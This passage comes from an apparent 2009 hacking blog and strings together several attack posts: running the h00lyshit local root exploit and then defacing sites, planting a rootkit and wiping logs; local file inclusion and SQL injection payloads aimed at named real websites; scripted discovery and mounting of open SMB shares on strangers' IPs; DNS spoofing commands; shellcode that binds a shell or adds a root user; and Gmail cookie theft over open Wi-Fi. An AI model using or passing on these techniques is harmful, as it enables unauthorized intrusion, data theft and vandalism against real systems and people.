-o h00lyshit<br /><br />Now we have created the executable file: h00lyshit.<br /><br />The command to run this exploit is:<br /><br />./h00lyshit <very><br /><br />We need a very big file on the disk in order to run successfully and to get root.<br /><br />We must create a big file in /tmp or into another writable folder.<br /><br />The command is:<br /><br />dd if=/dev/urandom of=largefile count=2M<br /><br />where largefile is the filename.<br /><br />We must wait 2-3 minutes for the file creation<br /><br />If this command fails we can try:<br /><br />dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024<br /><br />Now we can procced to the last step. We can run the exploit by typing:<br /><br />./h00lyshit largefile or<br /><br />./h00lyshit /tmp/largefile<br /><br />(If we are in a different writable folder and the largefile is created in /tmp)<br /><br />If there are not running errors (maybe the kernel is patched or is something wrong with<br />exploit run or large file) we will get root<br /><br />To check if we got root:<br /><br />id or<br /><br />whoami<br /><br />If it says root we got root!<br /><br />Now we can deface/mass deface all the sites of the server or to setup a rootkit (e.g.<br />SSHDoor) and to take ssh/telnet shell access to the server.<br /><br />We must erase all logs in order to be safe with a log cleaner. A good cleaner for this<br />job is the MIG Log Cleaner.<br /><br />-<br /><br />RoMeO<br /></pre>.http://www.blogger.com/profile/11632901016120998126noreply@blogger.com1tag:blogger.com,1999:blog-5375501825270350941.post-68969332582452679422009-07-06T23:55:00.000-07:002009-07-06T23:56:34.574-07:00Local File Inclusion - LFI<pre>[- How to Find LFI Vulnerability -]<br /><br />How to Find LFI Vulnerability, Well i use me of adding ..<br />Example<br /><br />www.site.com/index.php?p=..<br /><br /><br /><br /><br /><br />Real World Examples:<br /><br />http://www.jedit.org/index.php?page=..<br /><br /><br /><br /><br />Warning: main(...html): failed to open stream: No such file or directory in /home/groups/j/je/jedit/htdocs/index.php on line<br />63<br /><br />Warning: main(): Failed opening '...html' for inclusion (include_path='.:/usr/local/share/pear') in /home/groups/j/je/jedit/htdocs/index.<br />php on line 63<br /><br /><br /><br /><br />This is not Vulnerable,<br />A Vulnerable should look like<br /><br />Warning: include() [function.include]: Failed opening '...php' for inclusion (include_path='.:/usr/share/pear') in /<br />home/shiner/shiner.com/htdocs/beers/beers-home.php on line 62<br /><br /><br /><br /><br />include is the code , the script is using for example<br /><br /><br /><br /><?php<br />$page = $_GET[page];<br />include($page);<br />?><br /><br /><br /><br /><br />Should be [function.include]<br />but<br /><br /><br /><?php<br />$page = $_GET[page];<br />require_once($page);<br />?><br /><br /><br /><br /><br />should be [function.require_once] or [function.require]<br /><br />[- Find Example (Real) -]<br /><br />http://www.crew4sea.com/indexm.php?url=..<br /><br /><br /><br /><br />Gives us.<br /><br />Fatal error: require_once() [function.require]: Failed opening required './..' (include_path='.:/:/usr/php/pear'<br />) in /indexm.php on line 164<br /><br /><br /><br /><br />[b][function.require][/b]<br /><br /><br /><br /><br />So we know it Vulnerable<br /><br />if Windows OS, you can just do<br /><br />http://www.crew4sea.com/indexm.php?url=indexm.php<br /><br /><br /><br /><br /><br />other try<br />http://www.crew4sea.com/indexm.php?url=/etc/passwd<br />http://www.crew4sea.com/indexm.php?url=/etc/passwd<br />http://www.crew4sea.com/indexm.php?url=../etc/passwd<br />http://www.crew4sea.com/indexm.php?url=../etc/passwd<br /><br />until you get Something.</pre>.http://www.blogger.com/profile/11632901016120998126noreply@blogger.com2tag:blogger.com,1999:blog-5375501825270350941.post-19214541917255438232009-07-02T09:44:00.001-07:002009-07-02T09:46:30.455-07:00Angry IP Scan Hacked PortsAngry IP Stripper...<br /><br />I hate cut n pasting IP's from Angry IP to my command prompt or from my Export of scanned IP's from Angry to cmd.<br />I looked at ways to speed up the process of doing the following command "net view \\" without the need to go back and forth from one window to another 50 times to find a small list of IP's with open shares.<br /><br />I ask around on a few different Forums and someone gave me the key to make one command to stripped Agry's export and out put the IP's into CMD with the command net view \\ and do the crap work for me.<br /><br />So now I can type one command or cut n paste one command to do 50 or whatever search's for open share's.<br /><br />Here it is...<br /><br />for /F "eol=; tokens=1,2* delims=, " %i in (2.txt) do @echo net view \\%i>>1.bat<br /><br />Ok let me explain a few things.<br /><br />When Angry has finished scanning a range, I export the results to a .txt file, I might name it 1.txt or 2.txt.<br /><br />Inside the txt file it looks like this<br />-------------------------------<br />This file was generated by Angry IP Scanner<br />Visit http://www.angryziber.com/ for the latest version<br /><br /><br />Scanned 217.81.105.1 - 217.81.255.255 (Ports: 5110,139,12345,23,445)<br />24/03/2008 11:59:28 PM<br /><br />IP Ping Hostname Comp. Name Group Name User Name MAC Address TTL Open Ports<br /><br />217.81.122.148 92 ms pD9517A94.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 23<br />217.81.128.1 994 ms pD9518001.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 23<br />217.81.136.236 327 ms pD95188EC.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 23<br />217.81.143.82 1806 ms pD9518F52.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 23<br />217.81.190.34 733 ms pD951BE22.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 445<br />217.81.209.185 651 ms N/A N/A N/A N/A N/A N/A 23<br />217.81.230.253 290 ms pD951E6FD.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 445<br />217.81.235.126 417 ms pD951EB7E.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 445<br />217.81.246.211 198 ms N/A N/A N/A N/A N/A N/A 23<br />217.81.248.34 387 ms pD951F822.dip.t-dialin.netCONNIPET N/A CONNIPET N/A N/A 139<br />217.81.250.37 331 ms pD951FA25.dip.t-dialin.netN/A N/A N/A N/A N/A 23<br />217.81.251.202 101 ms pD951FBCA.dip.t-dialin.netHOME-PC ARBEITSGRUPPE N/A N/A 50 139<br />217.81.255.60 128 ms pD951FF3C.dip.t-dialin.netN/A N/A N/A N/A N/A 139,445<br />-------------------------<br /><br />I dont have to get Angry to save all this info, I just like looking at the different names to get a feel of what a system might have on it.<br /><br />That export is saved to c:\ for example, I run cmd.exe, goto c:\, type dir and there it is.<br /><br />I paste in the for command, for /F "eol=; tokens=1,2* delims=, " %i in (2.txt) do @echo net view \\%i>>1.bat<br /><br /><br />I double check its going to look in the correct txt file and also pick a name for the bat file, (auto, 1, run) it doesnt matter what the .bat is called, once I check and see the info is correct I hit enter...<br /><br />Then type the name of the .bat file and its running by itself..<br /><br />--------------------------<br />Ctrl-Break, to stop the batch file running. Hit 3 or 4 times and wait 10 seconds..<br /><br />So for me it looks like this<br />-<br />C:\>for /F "eol=; tokens=1,2* delims=, " %i in (2.txt) do @echo net view \\%i>>1<br />.bat<br /><br />C:\>1<br />C:\>net view \\217.81.122.148<br />System error 53 has occurred. <---(Most likely firewall)<br />The network path was not found.<br />C:\>net view \\217.81.128.1<br /><br />-<br /><br />The other thing I do is increase the command prompt height buffer so that all the information scrolling a long doesnt get lost, right click command prompt, select properties, layout, increase screen buffer size Height to 1000 or more depending on how many IPS you need to check.<br /><br />Sit back and wait for it to go through the list, 50's a good number. once its done, right click the screen, mark it all, right click it again and save it in note pad and check what you have to open up..<br />-<br />net view \\89.214.144.144<br />Shared resources at \\89.214.144.144<br />Sandra<br />Share name Type Used as Comment<br />-------------------------------------------------------------<br />C Disk<br />Enviar Para o OneNote 2007 Print Enviar Para o OneNote 2007<br />Fact2007 Disk<br />HP Photosmart 7400 Series Print HP Photosmart 7400 Series<br />I Disk<br />Public Disk<br />Users Disk<br />The command completed successfully.<br />-<br /><br />(One scan brought up this list of drives on a share.)<br /><br />c:\net use k: \\89.214.144.144\C<br />c:\The command completed successfully.<br />c:\net use L: \\89.214.144.144\Fact2007<br />c:\The command completed successfully<br />c:\net use M: \\89.214.144.144\I<br />c:\The command completed successfully<br /><br />Now in my compuer under network drives, I have 3 new shares to look at.<br /><br />c on '89.214.144.144'<br />Fact2007 on '89.214.144.144'<br />I on '89.214.144.144'<br /><br /><br />Once your done browsing don't forget to right click on these and disconnect, otherwise your system will run real slow.<br /><br />Also each time you run the for command and you dont change the name of your .bat file new infomation is added to it instead of it been over written.<br />Why this is, Im not sure, it just means the list will grow and it will take longer and longer to run a scan, so del *.bat before you run a new Stripper.<br /><br />c:\edit *.bat, Select shift-Arrow Down to select a portion to delete is another option.<br />Edit also lets to look at what the bat looks like. The start of the bat has a little junk in it it while its running.<br /><br />---<br />C:\>1<br />C:\>net view \\This<br />System error 53 has occurred.<br />The network path was not found.<br />C:\>net view \\Visit<br />System error 53 has occurred.<br />The network path was not found.<br />C:\>net view \\Scanned<br />System error 53 has occurred.<br />The network path was not found.<br />C:\>net view \\24/03/2008<br />System error 123 has occurred.<br />The filename, directory name, or volume label syntax is incorrect.<br />C:\>net view \\IP<br />System error 53 has occurred.<br />The network path was not found.<br />C:\>net view \\217.81.99.29<br />-<br /><br />Edit the bat file to remove the first couple of lines ot just ignore it and let it run.<br /><br />c:\for /?<br /><br />Brings up all the help info on the "for" command, I never knew about it until I started asking about how to do this, I was exspecting someone to write a perl script or something, but this just goes to show theres still a lot to learn inside windows and all the little files that are with in.<br /><br />I hope you guys find this useful and a real time saver and look at new ways to use the for command.<br /><br />Regards RoMeO....http://www.blogger.com/profile/11632901016120998126noreply@blogger.com1tag:blogger.com,1999:blog-5375501825270350941.post-19799932451203172582009-07-02T09:39:00.001-07:002009-07-02T09:39:56.099-07:00Computer Acronyms (Basic)Computer Acronyms ,The List<br /><br />ADSL - Asymmetric Digital Subscriber Line<br />AGP - Accelerated Graphics Port<br />ALI - Acer Labs, Incorporated<br />ALU - Arithmetic Logic Unit<br />AMD - Advanced Micro Devices<br />APC - American Power Conversion<br />ASCII - American Standard Code for Information Interchange<br />ASIC - Application Specific Integrated Circuit<br />ASPI - Advanced SCSI Programming Interface<br />AT - Advanced Technology<br />ATI - ATI Technologies Inc.<br />ATX - Advanced Technology Extended<br /><br />--- B ---<br />BFG - BFG Technologies<br />BIOS - Basic Input Output System<br />BNC - Barrel Nut Connector<br /><br />--- C ---<br />CAS - Column Address Signal<br />CD - Compact Disk<br />CDR - Compact Disk Recorder<br />CDRW - Compact Disk Re-Writer<br />CD-ROM - Compact Disk - Read Only Memory<br />CFM - Cubic Feet per Minute (ft?/min)<br />CMOS - Complementary Metal Oxide Semiconductor<br />CPU - Central Processing Unit<br />CTX - CTX Technology Corporation (Commited to Excellence)<br /><br />--- D ---<br /><br />DDR - Double Data Rate<br />DDR-SDRAM - Double Data Rate - Synchronous Dynamic Random Access Memory<br />DFI - DFI Inc. (Design for Innovation)<br />DIMM - Dual Inline Memory Module<br />DRAM - Dynamic Random Access Memory<br />DPI - Dots Per Inch<br />DSL - See ASDL<br />DVD - Digital Versatile Disc<br />DVD-RAM - Digital Versatile Disk - Random Access Memory<br /><br />--- E ---<br />ECC - Error Correction Code<br />ECS - Elitegroup Computer Systems<br />EDO - Extended Data Out<br />EEPROM - Electrically Erasable Programmable Read-Only Memory<br />EPROM - Erasable Programmable Read-Only Memory<br />EVGA - EVGA Corporation<br /><br />--- F ---<br />FC-PGA - Flip Chip Pin Grid Array<br />FDC - Floppy Disk Controller<br />FDD - Floppy Disk Drive<br />FPS - Frame Per Second<br />FPU - Floating Point Unit<br />FSAA - Full Screen Anti-Aliasing<br />FS - For Sale<br />FSB - Front Side Bus<br /><br />--- G ---<br />GB - Gigabytes<br />GBps - Gigabytes per second or Gigabits per second<br />GDI - Graphical Device Interface<br />GHz - GigaHertz<br /><br />--- H ---<br />HDD - Hard Disk Drive<br />HIS - Hightech Information System Limited<br />HP - Hewlett-Packard Development Company<br />HSF - Heatsink-Fan<br /><br />--- I ---<br />IBM - International Business Machines Corporation<br />IC - Integrated Circuit<br />IDE - Integrated Drive Electronics<br />IFS- Item for Sale<br />IRQ - Interrupt Request<br />ISA - Industry Standard Architecture<br />ISO - International Standards Organization<br /><br />--- J ---<br />JBL - JBL (Jame B. Lansing) Speakers<br />JVC - JVC Company of America<br /><br />- K ---<br />Kbps - Kilobits Per Second<br />KBps - KiloBytes per second<br /><br />--- L ---<br />LG - LG Electronics<br />LAN - Local Are Network<br />LCD - Liquid Crystal Display<br />LDT - Lightning Data Transport<br />LED - Light Emitting Diode<br /><br />--- M ---<br />MAC - Media Access Control<br />MB ? MotherBoard or Megabyte<br />MBps - Megabytes Per Second<br />Mbps - Megabits Per Second or Megabits Per Second<br />MHz - MegaHertz<br />MIPS - Million Instructions Per Second<br />MMX - Multi-Media Extensions<br />MSI - Micro Star International<br /><br />--- N ---<br />NAS - Network Attached Storage<br />NAT - Network Address Translation<br />NEC - NEC Corporation<br />NIC - Network Interface Card<br /><br />--- O ---<br />OC - Overclock (Over Clock)<br />OCZ - OCZ Technology<br />OEM - Original Equipment Manufacturer<br /><br />--- P ---<br />PC - Personal Computer<br />PCB - Printed Circuit Board<br />PCI - Peripheral Component Interconnect<br />PDA - Personal Digital Assistant<br />PCMCIA - Peripheral Component Microchannel Interconnect Architecture<br />PGA - Professional Graphics Array<br />PLD - Programmable Logic Device<br />PM - Private Message / Private Messaging<br />PnP - Plug 'n Play<br />PNY - PNY Technology<br />POST - Power On Self Test<br />PPPoA - Point-to-Point Protocol over ATM<br />PPPoE - Point-to-Point Protocol over Ethernet<br />PQI - PQI Corporation<br />PSU - Power Supply Unit<br /><br />--- R ---<br />RAID - Redundant Array of Inexpensive Disks<br />RAM - Random Access Memory<br />RAMDAC - Random Access Memory Digital Analog Convertor<br />RDRAM - Rambus Dynamic Random Access Memory<br />ROM - Read Only Memory<br />RPM - Revolutions Per Minute<br /><br />--- S ---<br />SASID - Self-scanned Amorphous Silicon Integrated Display<br />SCA - SCSI Configured Automatically<br />SCSI - Small Computer System Interface<br />SDRAM - Synchronous Dynamic Random Access Memory<br />SECC - Single Edge Contact Connector<br />SODIMM - Small Outline Dual Inline Memory Module<br />SPARC - Scalable Processor ArChitecture<br />SOHO - Small Office Home Office<br />SRAM - Static Random Access Memory<br />SSE - Streaming SIMD Extensions<br />SVGA - Super Video Graphics Array<br />S/PDIF - Sony/Philips Digital Interface<br /><br />--- T ---<br />TB - Terabytes<br />TBps - Terabytes per second<br />Tbps - Terabits per second<br />TDK - TDK Electronics<br />TEC - Thermoelectric Cooler<br />TPC - TipidPC<br />TWAIN - Technology Without An Important Name<br /><br />--- U ---<br />UART - Universal Asynchronous Receiver/Transmitter<br />USB - Universal Serial Bus<br />UTP - Unshieled Twisted Pair<br /><br />--- V ---<br />VCD - Video CD<br />VPN - Virtual Private Network<br /><br />--- W ---<br />WAN - Wide Area Network<br />WTB - Want to Buy<br />WYSIWYG - What You See Is What You Get<br /><br />--- X ---<br />XGA - Extended Graphics Array<br />XFX - XFX Graphics, a Division of Pine<br />XMS - Extended Memory Specification<br />XT - Extended Technology.http://www.blogger.com/profile/11632901016120998126noreply@blogger.com0tag:blogger.com,1999:blog-5375501825270350941.post-53974945280824975882009-07-02T09:36:00.001-07:002009-07-02T09:37:17.647-07:00DNS SpoofingWhat is DNS Spoofing ?<br /><br /><br />DNS Spoofing is the art of making a DNS entry to point to an another IP<br />than it would be supposed to point to. To understand better, let's see<br />an example.You're on your web browser and wish to see the news on<br />www.cnn.com, without to think of it, you just enter this URL in your<br />address bar and press enter.<br />Now, what's happening behind the scenes<br />? Well... basically, your browser is going to send a request to a DNS<br />Server to get the matching IP address for www.cnn.com, then the DNS<br />server tells your browser the IP address of CNN, so your browser to<br />connect to CNN's IP address and display the content of the main page.<br />Hold<br />on a minute... You get a message saying that CNN's web site has closed<br />because they don't have anymore money to pay for their web site. You're<br />so amazed, you call and tell that to your best friend on the phone, of<br />course he's laughing at you, but to be sure, he goes to CNN web site to<br />check by himself.<br />You are surprised when he tells you he can see the<br />news of the day as usual and you start to wonder what's going on. Are<br />you sure you are talking to the good IP address ?Let's check. You ask<br />your friend to fire up his favorite DNS resolving tool and to give you<br />the IP address he's getting for www.cnn.com.Once you got it, you put it<br />in your browser URL bar :<br /><br />http://212.153.32.65<br /><br />You feel ridiculous and frustrated when you see CNN's web page with its<br />daily news.<br />Well<br />you've just been the witness of a DNS hijacking scenario. You're<br />wondering what happened, did the DNS Server told you the wrong IP<br />address ? Maybe... At least this is the most obvious answer coming to<br />our mind.<br />In fact there are two techniques for accomplishing this DNS hijacking.<br />Let's see the first one, the "DNS ID Spoofing" technique.<br /><br />1) DNS Cache Poisoning<br /><br />As<br />you can imagine, a DNS server can't store information about all<br />existing names/IP on the net in its own memory space.That's why DNS<br />server have a cache, it enables them to keep a DNS record for a while.<br />In<br />fact, A DNS Server has the records only for the machines of the domain<br />it has the authority, if it needs to know about machines out of his<br />domain, it has to send a request to the DNS Server which handles these<br />machines and since it doesn't want to ask all the time about records,<br />it can store in its cache the replies returned by other DNS servers.<br />Now let's see how someone could poison the cache of our DNS Server.<br />An<br />attacker his running is own domain (attacker.net) with his own hacked<br />DNS Server(ns.attacker.net) . Note that I said hacked DNS Server<br />because the attacker customized the records in his own DNS server, for<br />instance one record could be www.cnn.com=81.81.81.81<br />1) The attacker sends a request to your DNS Server asking it to resolve<br />www.attacker.net<br />2) Your DNS Server is not aware of this machine IP address, it doesn't<br />belongs to his domain, so it needs to asks to the responsible name<br />server.<br />3) The hacked DNS Server is replying to your DNS server,<br />and at the same time, giving all his records (including his record<br />concerning www.cnn.com) Note : this process is called a zone transfer.<br />4) The DNS server is not "poisoned".The attacker got his IP, but who<br />cares, his goal was not to get the IP address of his web server but to<br />force a zone transfer and make your DNS server poisoned as long as the<br />cache will not be cleared or updated.<br />5) Now if you ask your DNS<br />server, about www.cnn.com IP address it will give you 172.50.50.50,<br />where the attacker run his own web server. Or even simple, the attacker<br />could just run a bouncer forwarding all packets to the real web site<br />and vice versa,so you would see the real web site, but all your traffic<br />would be passing through the attacker's web site.<br /><br />2) DNS ID Spoofing<br /><br />We<br />saw that when a machine X wants to communicate with a machine Y, the<br />former always needs the latter IP address. However in most of cases, X<br />only has the name of Y, in that case, the DNS protocol is used to<br />resolve the name of Y into its IP address.<br />Therefore, a DNS request<br />is sent to a DNS Server declared at X, asking for the IP address of the<br />machine Y. Meanwhile, the machine X assigned a pseudo random<br />identification number to its request which should be present in the<br />answer from the DNS server.Then when the answer from the DNS server<br />will be received by X, it will just have to compare both numbers if<br />they're the same, in this case, the answer is taken as valid,otherwise<br />it will be simply ignored by X.<br />Does this concept is safe ? Not<br />completely. Anyone could lead an attack getting this ID number. If<br />you're for example on LAN, someone who runs a sniffer could intercept<br />DNS requests on the fly, see the request ID number and send you a fake<br />reply with the correct ID number... but with the IP address of his<br />choice.Then, without to realize it, the machine X will be talking to<br />the IP of attacker's choice thinking it's Y.<br /><br />By the way, the DNS<br />protocol relies on UDP for requests (TCP is used only for zone<br />transfers), which means that it is easy to send a packet coming from a<br />fake IP since there are no SYN/ACK numbers (Unlike TCP, UDP doesn't<br />provide a minimum of protection against IP spoofing).<br /><br />Nevertheless, there are some limitations to accomplish this attack.<br />In<br />my example above, the attacker runs a sniffer, intercept the ID number<br />and replies to his victim with the same ID number and with a reply of<br />his choice.<br />In the other hand, even if the attacker intercepted your<br />request, it will be transmitted to the DNS Server anyway which will<br />also reply to the request(unless the attacker is blocking the request<br />at the gateway or carry out ARP cache poisoning which would make the<br />attack possible on a switched network by the way).<br />That means that<br />the attacker has to reply BEFORE the real DNS server, which means that<br />to succeed this attack, the attacker MUST be on the same LAN so to have<br />a very quick ping to your machine, and also to be able to capture your<br />packets.<br /><br />Practical example ( for<br />testing purposes ONLY)<br />To see yourself how to hijack a connection from a machine on your local<br />area network,we can do the followings :<br />First step :Poison the ARP cache of the victim's machine (tools and explanations<br />for realizing this task can be found at http://www.arp-sk.org)<br />Second step :Now, outgoing packets of the target will be redirected to your host,but<br />you have to forward the traffic to the real gateway, this can be<br />achieved witha tool like Winroute Pro.<br />Third step :We then use WinDNSSpoof,<br />developed by valgasu (www.securiteinfo.org)<br />which isa tool that greatly help to carry out DNS ID Spoofing. (Before<br />to use this tool be sure you have the Winpcap library installed on your<br />machine, see http://winpcap.polito.it).We<br />run it in the cmd like :<br />wds -n www.cnn.com -i 123.123.123.123 -g 00-C0-26-DD-59-CF -v<br />This<br />will make www.cnn.com to point to 123.123.123.123 on the victim's<br />machine. 00-C0-26-DD-59-C being the MAC Address of the gateway or DNS<br />server..http://www.blogger.com/profile/11632901016120998126noreply@blogger.com0tag:blogger.com,1999:blog-5375501825270350941.post-16160708820903556712009-06-27T06:00:00.000-07:002009-06-27T06:01:04.885-07:00Database EncodingHuy guys,<br /><br />This's just little information I wanna show to u all here. It's about database character encoding used on server. As u know that there are lots of character encoding method used by webmaster out there such as UTF 8, latin1, etc. Each of encoding techniques has its effective way for showing characters in the client machine. What does it mean ?<br /><br />Okay, suppose that we have webserver with latin1-encoded database. Latin1 will support character from The Americas, Western Europe, Oceania, and much of Africa. Client user will get character/output from webserver normally. But, how if the client is from East -Asian ?? Sure, latin1 encoding technique won't support it. So, what the relation between latin1 encoding and database SQL ?<br /><br />Well guys...<br /><br />#1. Let's take one sample vulnerable web :<br /><br />http://www.iptek.net.id/ind/?mnu=1&ch=berita&id=-659 union all select 1,2,3,4,5,6,7,8,9,10/*<br /><br /><br /><br /><br /><br />#2. Check the database version<br /><br />http://www.iptek.net.id/ind/?mnu=1&ch=berita&id=-659 union all select 1,2,3,version(),5,6,7,8,9,10/*<br /><br /><br /><br /><br /><br />Look !!<br />Nothing appear on the screen, why ??<br />This's because the webserver is using another encoding instead of UTF8. How do we know that it uses UTF8 for encoding ?<br />I just guess since UTF 8 is generally used by most webserver out there. And how do we resolve this ?<br /><br />#3. Use another character encoding<br /><br /> <br />http://www.iptek.net.id/ind/?mnu=1&ch=berita&id=-659 union all select 1,2,3,convert(version() using latin1),5,6,7,8,9,10/* <br /><br /><br /><br />Why we should use latin1 not the other character encoding ??<br />Because latin 1 is the previous character encoding developed on SQL (version 3/4) before UTF8. So, we can guess from here that latin 1 must be used instead of UTF 8.<br /><br />#4. Yuppy... now the database version could be read on the screen.<br /><br />Most SQL-injector usually forget about this technique. So, hope u won't forget this after u read my article.<br />Cheers Liamo. :).http://www.blogger.com/profile/11632901016120998126noreply@blogger.com0tag:blogger.com,1999:blog-5375501825270350941.post-6864337796533007832009-06-27T05:58:00.000-07:002009-06-27T05:59:25.381-07:00Shellcodes - How They Work?It's not an easy task to find a vulnerable service and find an exploit for it. It's also not easy to defend against users who might want to exploit y <br />our system, if you are a system administrator. However, writing an exploit by yourself, to convert a news line from bug tracker into a working lockpic <br />k, is much more difficult. This article is not a guide on writing exploits, nor an overview of popular vulnerabilities. This is a step-by-step guide o <br />n developing a shellcode, a crucial point of any exploit software. Hopefully, learning how they work will help conscientious and respectable developer <br />s and system administrators to understand how malefactors think and to defend their systems against them. <br />How an Exploit Works <br /> <br />Take any exploit downloaded from the internet that promises you an easy root shell on a remote machine, and examine its source code. Find the most un <br />intelligible piece of the code; it will be there, for sure. Most probably, you will find a several lines of strange and unrelated symbols; som <br />ething like this: <br />char shellcode[] = <br />"\x33\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8a" <br />"\xd4\xf2\xe7\x83\xeb\xfc\xe2\xf4\xbb\x0f\xa1\xa4\xd9\xbe\xf0\x8d" <br />"\xec\x8c\x6b\x6e\x6b\x19\x72\x71\xc9\x86\x94\x8f\x9b\x88\x94\xb4" <br />"\x03\x35\x98\x81\xd2\x84\xa3\xb1\x03\x35\x3f\x67\x3a\xb2\x23\x04" <br />"\x47\x54\xa0\xb5\xdc\x97\x7b\x06\x3a\xb2\x3f\x67\x19\xbe\xf0\xbe" <br />"\x3a\xeb\x3f\x67\xc3\xad\x0b\x57\x81\x86\x9a\xc8\xa5\xa7\x9a\x8f" <br />"\xa5\xb6\x9b\x89\x03\x37\xa0\xb4\x03\x35\x3f\x67"; <br /> <br />This is shellcode, also sometimes referred to as "bytecode." Its content is not a magic word or random symbols. This is a set of low-level machine co <br />mmands, the same as are in an executable file. This example shellcode opens port 4444 on a local linux box and ties a Bourne shell to it with root pri <br />vileges. With a shellcode, you can also reboot a system, send a file to an email, etc. The main task for an exploit program is therefore to make this <br />shellcode work. <br /> <br />Take, for example, a widely known error-buffer overflow. Developers often check data that has been received as input for functions. A simple example{ <br /> : } the developer creates a dynamic array, allocates for it 100 bytes, and does not control the real number of elements. All elements that are out of <br /> the bounds of this array will be put into a stack, and a so-called buffer overflow will occur. An exploit's task is to overflow a buffer and, after t <br />hat, change the return address of system execution to the address of the shellcode. If a shellcode can get control, it will be executed. It's pretty s <br />imple. <br /> <br />As I already said, this article is not a guide for writing exploits. There are many repositories with existing shellcodes (shellcode.org, Metasploit) <br />; however, it is not always enough. A shellcode is a low-level sequence of machine commands closely tied to a dedicated processor architecture and <br /> operating system. This is why understanding how it works can help prevent intrusions into your environment. <br />What Is It For? <br /> <br />To follow along, I expect you to have at least minimal assembly knowledge. As a platform for experiments, I chose Linux with a 32-bit x86 processor. <br />Most exploits are intended for Unix services; therefore, they are of most interest. You need several additional tools: Netwide Assembler (nasm <br />), ndisasm, and hexdump. Most Linux distributions include these by default. <br />The Process of Building <br /> <br />Shellcode stubs are usually written in assembler; however, it is easier to explain how one works by building it in C and then rewriting the same <br />code in assembly. This is C code for appending a user into /etc/passwd: <br />#include <stdio.h> <br />#include <fcntl.h> <br /> <br />main() { <br />char *filename = "/etc/passwd"; <br />char *line = "hacker:x:0:0::/:/bin/sh\n"; <br />int f_open; <br />f_open = open(filename,O_WRONLY|O_APPEND); <br />write(f_open, line, strlen(line)); <br />close(f_open); <br />exit(0); <br />} <br /> <br />All of the code is pretty simple, except maybe the open() function. The constant O_WRONLY|O_APPEND given as a parameter opens the file fact for writi <br />ng and appends the new data to the end of the file. <br /> <br />Here is a more usable example: executing a Bourne shell: <br />#include <stdio.h> <br /> <br />main() { <br />char *name[2]; <br />name[0] = "/bin/sh"; <br />name[1] = NULL; <br />setreuid(0, 0); <br />execve(name[0],name, NULL); <br />} <br /> <br />The setreuid(0,0) call attempts to obtain root privileges (if it is possible). execve(const char filename,const char[] argv, const char[{ <br /> ] } envp) is a main system call that executes any binary file or script. It has three parameters: filename is a full path to an executable file, <br />argv[] is an array of arguments, and envp[] is an array of strings in the format key=value. Both arrays must end with a NULL element. <br /> <br />Now consider how to rewrite the C code given in the first example in assembly. x86 assembly executes system calls with help of a special system inter <br />rupt that reads the number of the function from the EAX register and then executes the corresponding function. The function codes are in the file /usr <br />/include/asm/unistd.h. For example, a line in this file, #define __NR_ open 5, means that the function open() has the identification number 5. In a si <br />milar way, you can find all other function codes: exit() is 1, close() is 6, setreuid() is 70, and execve() is 11. This knowledge is enough to wri <br />te a simple working application. The /etc/passwd amendment application code in assembly is: <br />section .data <br />filename db '/etc/passwd', 0 <br />line db 'hacker:x:0:0::/:/bin/sh',0x0a <br /> <br />section .text <br />global _start <br /> <br />_start: <br />; open(filename,O_WRONLY|O_APPEND) <br />mov eax, 5 <br />mov ebx, filename <br />mov ecx, 1025 <br />int 0x80 <br />mov ebx, eax <br /> <br />; write(f_open, line, 24) <br />mov eax, 4 <br />mov ecx, line <br />mov edx, 24 <br />int 0x80 <br /> <br />; close(f_open) <br />mov eax, 6 <br />int 0x80 <br /> <br />; exit(0) <br />mov eax, 1 <br />mov ebx, 0 <br />int 0x80 <br /> <br />It's a well-known fact that an assembly program consists of three segments: the data segment, which contains variables; the code segment cont <br />aining code instructions; and a stack segment, which provides a special memory area for storing data. This example uses only data and code segment <br />s. The operators section .data and section .text mark their beginnings. A data segment contains the declaration of two char variables: name and li <br />ne, consisting of a set of bytes (see the db mark in the definition). <br /> <br />The code segment starts from a declaration of an entry point, global _start. This tells the system that the application code starts at the _start lab <br />el. <br /> <br />The next steps are easy; to call open(), set the EAX register to the appropriate function code: 5. After that, pass parameters for the functi <br />on. The most simple way of passing parameters is to use the registers EBX, ECX, and EDX. EBX gets the first function parameter, the address of the beg <br />inning of the filename string variable, which contains a full path to a file and a finishing zero char (most system functions operating with strings d <br />emand a trailing null). The ECX register gets the second parameter, giving information about file open mode (a constant O_WRONLY|O_APPEND in a numeric <br /> format). With all of the parameters set, the code calls interrupt 0x80. It will read the function code from EAX and calls an appropriate function. Af <br />ter completing the call, the application will continue, calling write(), close(), and exit() in exactly the same way..http://www.blogger.com/profile/11632901016120998126noreply@blogger.com1tag:blogger.com,1999:blog-5375501825270350941.post-28527679158716331532009-06-27T05:57:00.000-07:002009-06-27T05:58:15.835-07:00Sniff Gmail cookiesToday i will Teach u how to Sniff Gmail cookies in Unsecured Wireless network using Wifizoo tool in Backtrack 3<br /><br />1) mkdir /root/Desktop/wifizoo<br />2) cd /root/Desktop/wifizoo<br />3) wget http://wifizoo.info/wifizoo_black_v1.3.tar.bz2<br />4) tar jxvf wifizoo_black_v1.3.tar.bz2<br />5) cd /root/Desktop/wifizoo/wifizoo_black_v1.3<br /><br />Now we'll open the file with kwrite wifizoo.py (python script language) and modify it to match with the interface u use. at the row 50 , it will indicate the interface,<br />as my card is RT 73 Chipset i use rausb0<br /><br />Code:<br /><br />6) conf.iface = 'rausb0?<br /><br />then make sure u make ur wifi card in Monitor mode<br /><br />run this command in another Terminal<br /><br />7) airmon-ng start rausb0<br /><br />and then monitor the Access Points<br /><br />8) airodump-ng rausb0<br /><br />then come back to 1st terminal<br /><br />and type this command<br /><br />9) python wifizoo.py -i rausb0 (your Interface)<br /><br />It can be seen that interface wifizoo launches web port 8000 on the local server and the proxy is available on port 8080.<br />This will be very useful in the future First, let us connect to wifizoo control panel with firefox:<br /><br />10)firefox 127.0.0.1:8000<br /><br />And here's administrative interface Wifizoo<br /><br />We get down to business by clicking on "Cookies":<br /><br />heyyy Wifizoo has captured cookies, you can see the image on a cookie google mail.<br />Before you can use these cookies, you must configure Firefox to connect through proxy turning locally on port 8080. It is in Edit, Preferences, Network, check on Manual proxy configuration and configure the 